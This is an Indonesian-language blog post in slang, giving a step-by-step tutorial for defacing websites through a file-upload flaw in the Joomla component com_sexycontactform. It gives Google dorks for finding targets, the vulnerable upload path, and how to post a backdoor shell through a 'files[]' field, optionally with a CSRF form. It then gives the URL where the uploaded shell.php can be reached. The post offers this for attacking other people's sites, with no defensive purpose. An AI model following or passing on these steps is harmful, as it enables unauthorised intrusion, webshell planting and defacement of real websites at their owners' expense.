Deface Metode Com_Sexycontactform

By Wednesday, December 27, 2017 Add Comment

yo wats apa kabs :v
back lagi bareng gue, nah sekarang gue mau ngasih tutor cara deface POC 
"COM_SEXYCONTACTFORM"

 kuy langsung aja, pertama kalian dorking dulu

 Dork: inurl:/com_sexycontactform/ site:org (ganti sama site lain)
          inurl:/components/com_sexycontactform/

 yap pertama kalian Dorking dulu di search engine Google
nah disini gue udah dapet target, langsung aja kalian masukin Exploitnya

 /fileupload/index.php

 jadinya kaya gini :
http://www.target.co.li/components/com_sexycontactform/fileupload/index.php

 nah ciri" vuln itu kaya gini loh mas e
tapi ga semua yang kaya gini bisa di upload shell :v

 oke buat csrf kalian bisa make punya Eldersc0de > HERE
atau mau versi html nya aja

kalo buat yang onlen, kelean isin POST nya pake > files[]
pilih shell bekdur kaliann
langsung upload coggg !!!

 kalo berhasil nanti hasilnya akan kaya gini sob
oke langsung aja akses file/shell elu di

http://www.target.co.li/components/com_sexycontactform/fileupload/files/shell.php


Gotcha !! gampang bukan ? :v woke lah terserah mau di eue atao nitip doang, w saranin BACKUP INDEX YA TOD

kalo ada yang kurang paham, boleh komentar dengan sopan !


Author   : Abdi Prawira Negara
Source  : Https://Google.com

0 Response to "Deface Metode Com_Sexycontactform"

Post a Comment

Subscribe to: Post Comments (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel